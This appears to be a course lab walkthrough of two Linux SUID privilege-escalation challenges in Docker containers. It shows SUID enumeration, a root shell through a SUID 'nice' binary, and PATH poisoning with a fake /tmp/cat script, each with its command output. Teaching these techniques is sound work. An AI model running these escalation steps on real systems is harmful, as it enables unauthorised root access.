Skip to content

Suid Based privesc: Walkthrough

We have 2 challenges around SUID based privesc.

  • In the first we have a similar issue to the previous Sudo based vuln.
  • In the second we are going to look at how environment variables like the PATH are retained

SUID file based exploit

In this exploit we will see how SUID rights on a program could lead to the system being exploited.

The challenge lives in the Week4/Demos/Suid_Demo_File folder in the course GitHub

Start the Challenge

As usual we start the challenge using docker compose

$ docker-compose up
Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/
Creating network "suid_demo_file_default" with the default driver
Creating suid_demo_file_ssh_1 ... done
Attaching to suid_demo_file_ssh_1
ssh_1  | ==============================================================
ssh_1  | |                                                            |
ssh_1  | |                                                            |
ssh_1  | |   SSH Service Started:                                     |
ssh_1  | |                                                            |
ssh_1  | |                 Username:  cueh                            |
ssh_1  | |                 Password:  cueh                            |
ssh_1  | |                                                            |
ssh_1  | |   IP address For SSH is 192.168.176.2                          |
ssh_1  | |                                                            |
ssh_1  | |                                                            |
ssh_1  | |  Connect with: ssh cueh@192.168.176.2                          |
ssh_1  | |                                                            |
ssh_1  | ==============================================================

Connecting

Connect using SSH to the address given and do our preliminary recon

$ ssh cueh@192.168.176.2
The authenticity of host '192.168.176.2 (192.168.176.2)' can't be established.
ECDSA key fingerprint is SHA256:ZRkVNFCQPSUG1pbyc7qQXrxEY0uaOJ9FnfmpJ9Egjz0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.176.2' (ECDSA) to the list of known hosts.
cueh@192.168.176.2's password: 
Linux 2712cb718c76 5.4.95-1-lts #1 SMP Thu, 04 Feb 2021 11:58:09 +0000 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cueh@2712cb718c76:~$ ls -l
total 0

So nothing interesting in the userdir, can we run anything as with sudo?

cueh@2712cb718c76:~$ sudo -l
-bash: sudo: command not found
cueh@2712cb718c76:~$ 

No sudo rights either, The next thing to try is looking for suid files, we can use find for this.

cueh@2712cb718c76:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/nice
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/bin/mount
/bin/umount
/bin/ping
/bin/su

Now I recognise most of these as "standard" SUID files. However, the nice command wouldn't normally be here.

Looking on GTFO bins we can see that nice can be used to elevate privs, if it has suid rights nice on gtfo bins

Getting a Shell

Again we could do something like use cat to read the flag, but lets drop a root shell.

cueh@2712cb718c76:~$ nice /bin/sh -p
# id
uid=1000(cueh) gid=1000(cueh) euid=0(root) egid=0(root) groups=0(root),1000(cueh)
# 

We can now navigate to the root directory and get the flag.

Video

SUID path poisoning based exploit

Our second SUID based vulnerability takes advantage of how suid, unlike sudo, retains the users environment when called. This means we can manipulate environment variables (like the PATH) for the root user.

The docker file is in /Week4_Privec/Demos/Suid_Demo_Path

Connecting to the Service

After starting the service using docker compose we can connect and do our usual recon.

This time we see files in the users homedir.

$ ssh cueh@192.168.192.2
The authenticity of host '192.168.192.2 (192.168.192.2)' can't be established.
ECDSA key fingerprint is SHA256:ZRkVNFCQPSUG1pbyc7qQXrxEY0uaOJ9FnfmpJ9Egjz0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.192.2' (ECDSA) to the list of known hosts.
cueh@192.168.192.2's password: 
Linux 986f94f3abc8 5.4.95-1-lts #1 SMP Thu, 04 Feb 2021 11:58:09 +0000 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cueh@986f94f3abc8:~$ ls -l
total 20
-rwsr-xr-x 1 root root 8744 Feb  8 12:26 runme
-rwxr-xr-x 1 cueh cueh  147 Feb  8 12:26 source.c
-r-------- 1 root root   38 Feb  8 12:26 user.txt
cueh@986f94f3abc8:~$ 

OK, so we have a file with SUID privileges in the home dir, and its owned by root. We also have the source for the file.

Note

Obviously it wont always be this easy, but we are learning here.

Looking at the source.c we see the following line which gives us our vulnerability

system("cat user.txt");

The developer has used the system() function to call cat. This in its own right isn't a problem. However we use a non absolute path, which is.

Note

I always seem to use cat. Any command line function that is on the PATH would have the same issue. So things like ls, tar etc.

The issue here comes from the way Linux (and windows) look up executable. The PATH provides a list of directories that will be checked for the program, and the first instance will be run.

For example our PATH is

cueh@986f94f3abc8:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

So the program will look for cat in the following directories:

  1. /usr/local/bin
  2. /usr/bin
  3. /bin

If we had use an absolute path (/bin/cat), then this wouldn't be a problem, as the PATH never comes into play.

So if we can manipulate the path so out version of cat we control is the first one found, we should be able to get a shell

First create an evil version of cat and make it executable

$echo "/bin/sh" > /tmp/cat
$chmod +x /tmp/cat

Now modify the PATH so we look in /tmp first to get out shell

cueh@986f94f3abc8:~$ PATH=/tmp:$PATH ./runme 
# id
uid=0(root) gid=1000(cueh) groups=1000(cueh)
# 

Video

Task

Easytask

Complete the File based SUID Attack

Easytask

COmplete the Path poisoning based SUID attack

Back to top